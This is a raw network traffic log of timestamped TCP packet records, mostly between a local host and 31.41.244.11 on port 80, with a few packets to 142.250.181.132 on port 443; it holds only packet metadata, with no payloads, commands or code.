Dec 14, 2024 12:56:44.474910975 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.474942923 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.475727081 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.475867987 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.475980997 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.476008892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.476432085 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.476916075 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.477047920 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.477086067 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.477516890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.477925062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.477977037 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.616296053 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.616322041 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.616555929 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.616695881 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.616725922 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.616904020 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.617546082 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.617593050 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.617638111 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.618527889 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.618592978 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.618632078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.619599104 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.619731903 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.619754076 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.619813919 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.620594025 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.620758057 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.620803118 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.621682882 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.621786118 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.621839046 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.622778893 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.622823954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.622859955 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.623703957 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.623754978 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.623919010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.623936892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.623995066 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.624732018 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.624815941 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.624840975 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.624944925 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.625754118 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.625905991 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.626008034 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.626791000 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.626904964 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.627015114 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.627835989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.627932072 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.628007889 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.628941059 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.629040956 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.629173040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.629988909 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.630098104 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.630117893 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.630986929 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.631103992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.631145954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.631145954 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.632076979 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.632131100 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.632183075 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.633069038 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.633193970 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.633271933 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.634083033 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.634150982 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.634205103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.635140896 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.635232925 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.635298014 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.635662079 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.636182070 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.636308908 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.636363029 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.637284040 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.637387037 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.637455940 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.638243914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.638355970 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.638396978 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.639277935 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.639348984 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.639383078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.639791012 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.640336037 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.640424013 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.640569925 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.641383886 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.641496897 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.641546011 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.642474890 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.642549038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.642611027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.643445015 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.643503904 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.643579960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.643770933 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.644486904 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.644764900 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.644853115 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.645545959 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.645665884 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.645934105 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.646601915 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.646637917 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.646713972 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.647643089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.647687912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.647687912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.647943020 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.648168087 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.648688078 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.648845911 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.648910046 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.649086952 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.649787903 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.649842978 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.650019884 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.650772095 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.650847912 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.650885105 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.651671886 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.651804924 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.651928902 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.652107000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.652863026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.652968884 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.653033018 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.653912067 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.654104948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.654160976 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.654928923 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.655184031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.655226946 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.655765057 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.655941010 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.656053066 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.656095028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.656095028 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.656992912 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.657145977 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.657197952 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.657197952 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.658188105 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.658297062 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.658303022 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.658365965 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.659081936 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.659167051 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.659183979 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.659337044 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.660140991 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.660417080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.660624981 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.661175013 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.661611080 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.661683083 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.662180901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.662322044 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.662388086 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.663244963 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.663336992 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.663386106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.663809061 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.664299965 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.664374113 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.664392948 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.664537907 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.665291071 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.665384054 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.665404081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.665474892 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.666346073 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.666400909 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.666410923 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.666454077 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.667407990 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.667479038 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.667480946 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.667545080 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.668425083 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.668540955 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.668689013 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.669447899 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.669565916 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.669909000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.670434952 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.671668053 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.749099016 CET	49880	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:44.749186039 CET	443	49880	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:44.749344110 CET	49880	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:44.749552011 CET	49880	443	192.168.2.4	142.250.181.132
Dec 14, 2024 12:56:44.749576092 CET	443	49880	142.250.181.132	192.168.2.4
Dec 14, 2024 12:56:44.808655977 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.808712006 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.808924913 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.809092045 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.809120893 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.809509039 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.810264111 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.810286045 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.810353041 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.810353041 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.810792923 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.810843945 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.810866117 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.810920000 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.811810017 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.811938047 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.812041998 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.812892914 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.812957048 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.813014030 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.813086033 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.813901901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.814024925 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.814058065 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.814114094 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.814985991 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.815077066 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.815083027 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.815291882 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.816067934 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.816143036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.816183090 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.816323996 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.817047119 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.817118883 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.817353010 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.817892075 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.818044901 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.818131924 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.818171978 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.818257093 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.819097996 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.819212914 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.819214106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.819390059 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.820166111 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.820250988 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.820261002 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.820480108 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.821166992 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.821288109 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.821371078 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.822284937 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.822371960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.822499990 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.822540998 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.823260069 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.823338032 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.823378086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.823610067 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.824311018 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.824371099 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.824410915 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.825346947 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.825433016 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.825452089 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.826370001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.826469898 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.826482058 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.826791048 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.827414036 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.827514887 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.827526093 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.827608109 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.828519106 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.828547001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.828605890 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.829543114 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.829592943 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.829638958 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.829730988 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.830538988 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.830601931 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.830641031 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.830686092 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.831607103 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.831688881 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.831731081 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.831849098 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.832669973 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.832751989 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.832937956 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.832961082 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.833657026 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.833746910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.833786011 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.833961010 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.834692001 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.834805012 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.834841967 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.834881067 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.835748911 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.835879087 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.836138010 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.836790085 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.836831093 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.836872101 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.836910963 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.837866068 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.837928057 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.837939024 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.838160992 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.838885069 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.839003086 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.839083910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.839948893 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.839992046 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.840051889 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.840097904 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.841039896 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.841150045 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.841193914 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.841260910 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.842088938 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.842125893 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.842152119 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.842267036 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.843049049 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.843158960 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.843180895 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.843264103 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.844094038 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.844145060 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.844187021 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.844232082 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.845108032 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.845166922 CET	49860	80	192.168.2.4	31.41.244.11
Dec 14, 2024 12:56:44.845256090 CET	80	49860	31.41.244.11	192.168.2.4
Dec 14, 2024 12:56:44.845352888 CET	49860	80	192.168.2.4	31.41.244.11
